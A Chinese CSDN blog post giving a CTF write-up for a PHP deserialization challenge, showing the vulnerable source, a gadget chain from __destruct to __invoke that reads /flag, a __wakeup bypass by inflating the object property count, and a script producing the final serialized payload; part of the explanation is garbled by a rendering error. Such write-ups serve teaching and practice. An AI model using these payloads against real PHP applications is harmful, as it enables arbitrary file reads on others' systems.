魔术方法的触发在php反序列化中的应用

最新推荐文章于 2022-11-14 20:37:07 发布
最新推荐文章于 2022-11-14 20:37:07 发布
阅读量367 收藏
点赞数
文章标签: php ctf php反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/114493983
版权

源码:

<?php
show_source(__FILE__);

class CDUTSEC1{
    public $file;
    public $function;

    function __construct($file, $function)
    {
        $this->file = $file;
        $this->function = $function;
    }
    function __wakeup()     // Hint:听说你们喜欢绕__wakeup,但是我可听说官方在php7.0.10之后修复了这个bug
    {
        $this->file = __FILE__;
        $this->function = 'phpversion';
    }
    function __invoke()
    {
        return file_get_contents($this->file);
    }
    function __toString()
    {
        return file_get_contents($this->file);
    }
    function __get($function)
    {
        return $this->function;
    }
    function __call($a, $b){
        return $this->function;
    }
}

class CDUTSEC2{
    public $function = 'phpversion';

    function __destruct()
    {
        echo ($this->function)();   //
    }
}

@unserialize($_GET['payload']);

代码审计:
能拿flag的方式只有CDUTSEC1中__invoke和__toString两个魔术方法,触发能够执行file_get_contents($this->file)。所以只要CDUTSEC1类的file值为’/flag’(当然可能不在当前目录,视题而定)就能拿到flag了。
两个魔术方法的触发条件:
__invoke:当尝试以调用函数的方式调用一个对象时触发
__toString:一个类被当做字符串时触发。用于一个类被当成字符串时应怎样回应。例如 echo KaTeX parse error: Expected group after '_' at position 37: …字符串,否则会产生错误。 所以_̲_toSring无法触发。审计…function的值再次序列化即可。
但CDUTSEC1中在触发__invoke之前因为反序列化__weakup先触发并把我们传入的$file覆盖,因此我们需要绕过__weakup。利用的漏洞也很简单,只需要把序列化字符串表示类成员数量的数字改大(大于实际数)即可绕过。本例中,改CDUTSEC2与嵌套的CDUTSEC1都可以。
解题:

<?php

class CDUTSEC1{
    public $file;
    public $function;
}

class CDUTSEC2{
    public $function = 'phpversion';
}

$tr = new CDUTSEC1();
$tr->file = '/flag';          
$sr = new CDUTSEC2();
$sr->function = $tr;
echo serialize($sr);

运行代码得到:O:8:"CDUTSEC2":1:{s:8:"function";O:8:"CDUTSEC1":2:{s:4:"file";s:5:"/flag";s:8:"function";N;}},这里我们该大类成员数:O:8:"CDUTSEC2":1:{s:8:"function";O:8:"CDUTSEC1":3:{s:4:"file";s:5:"/flag";s:8:"function";N;}}即可。
测试payload:
在这里插入图片描述

H3rmesk1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[吃烤羊腿烫烫烫] Web_php_include 题解分析
布屿
02-28 3258
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0.分析代码 我们先来分析一下代码吧。 &lt...
PHP魔术方法之序列化与反序列化技术
username_lx的博客
07-02 533
目前理解觉得序列化就是用来保存数据的,将对象或变量以字符串形式保存。反序列化无非就是序列化转化成原来的变量或对象。 1.序列化:   定义:就是将一个变量所代表的“内存”数据,转换为“字符串”形式并持久保存在硬盘。    1.1普通变量的序列化 如:$v1 = 123;//这个变量代表内存空间的一段数据   $s1 = serialize($v1);//用serialize()方法将任
PHP反序列化魔术方法
东方
09-18 1681
文章目录概念相关函数 概念 概念和开发一样 相关函数 这两个函数是特征之一; 序列化的含义: o 是对象(数组反序列化的话 是 a) 4 是对象长度, 之后名字, 2 是变量个数, s代表字符串, 3 代表个数,后面 也是 一样的。 反序列化过程 ,可控点只有变量,函数 不可控。 局限性在于 其的 function 函数。函数没有危害性的话 漏洞也没有,或者xss之类...
php反序列化漏洞
qq_49015005的博客
07-02 175
该漏洞一般只能在代码审计发现,很难再黑盒测试发现 序列化serialize():把一个对象变成可以传输的字符串 class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} O:代表object //代表是一个对象
PHP反序列化
ws1813004226的博客
03-06 119
**PHP反序列化漏洞** 一、序列化定义:序列化(serialization)在计算机科学的数据处理,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络发送),以留待后续在相同或另一台计算机环境,能恢复原先状态的过程。概念很容易理解,其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 二、PHP序列化函数 序列化serialize() 序列化通俗点说就是把一个对象变成可以传输的字符串,比如...
文件包含漏洞总结
金色%夕阳的博客
08-19 1177
文件包含漏洞总结 CTF文件包含漏洞 0x01 什么是文件包含漏洞 0X02 文件包含漏洞的环境要求 0X03 常见文件包含函数 0X04 PHP伪协议 1、PHP://INPUT 2、PHP://FILTER 3、ZIP:// 4、DATA://与PHAR:// 0x05 包含APACHE日志文件 0x0
详解php反序列化
12-17
恶意用户可能构造特殊的序列化字符串,当这些字符串被反序列化时,可以触发对象的魔术方法(如`__wakeup()`),从而执行非预期的代码或者改变程序状态。魔术方法在特定情况下被自动调用,比如对象创建、序列化与...
php的常用魔术方法汇总
12-19
__wakeup()在反序列化时调用,用于恢复对象状态。 10. **__toString()**: 当尝试将对象转换为字符串(如echo或print)时,PHP调用此方法。在PHP 5.2.0及以后版本,也可以与printf()等格式化函数一起使用。 11....
PHP魔术方法总结和使用实例
10-24
- `__wakeup` 在对象被反序列化(使用 `unserialize` 函数)时调用,可以进行一些对象初始化的操作。 6. **__clone** - `__clone` 当对象被复制(克隆)时调用,可以自定义克隆行为,例如,为新克隆的对象设置...
基于PHP5魔术常量与魔术方法的详解
12-19
PHP5,魔术常量和魔术方法是两种特殊的语法结构,它们在特定情况下自动触发,为开发者提供了方便的功能和信息。以下是对这些特性的详细解释: **魔术常量**: 1. `__LINE__`:这个常量返回当前代码行的编号,在...
PHP命令执行集锦
蚁景网安学院
03-21 2353
代码审计总要遇到命令执行或者说RCE,打CTF的过程难免不碰见,毕竟PHP是世界上最好的语言,总结一下...
simple_php (攻防世界)
HackerYY的博客
11-14 2007
攻防世界simple_php 内附解题过程
CTFshow——PHP特性(上)
D.MIND 的博客
02-09 1594
web89——preg_match函数 、数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } preg
浅谈CTF代码审计PHP死亡退出
m0re's blog
10-24 1709
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
攻防世界web高手区(1-6)
bilala的博客
08-03 354
* baby_web 题目描述:想想初始页面是哪个 根据题目描述的提示,访问index.php后发现重定向,尝试抓包 访问得到flag:flag{very_baby_web} * Training-WWW-Robots 访问robots.txt,发现有访问得到flagcyberpeace{eac017d052248ca0093cc503b9e8ff07} php_rce Web_php_include <?phpshow_source(__FILE__);echo $_GET['he
php代码审计——初次尝试
以梦为马,不负韶华
11-26 1204
PHP代码审计练习
PHP#魔术方法全解
马丁路德彬
02-27 371
简介__construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone() 和 __debugInfo() 等方法在 PHP 被称为”
CTF】XCTF攻防世界web新手区
qq_45461251的博客
12-19 708
1、view source F12查看源代码即可。 2、get_post 第一步题目提示: 请用GET方式提交一个名为a,值为1的变量 于是更改URL为: 111.198.29.45:43088/?a=1 又根据提示有: 请再以POST方式随便提交一个名为b,值为2的变量 所以用火狐浏览器的插件hackbar: 3、robots 根据提示考察robots协议,于是更改URL为: 1...
ISCC-WP
热门推荐
qq_53142368的博客
06-04 1万+
2022-ISCC
php反序列化pop链
最新发布
10-17
PHP反序列化POP链是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程触发恶意代码,从而实现攻击目的。POP链是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值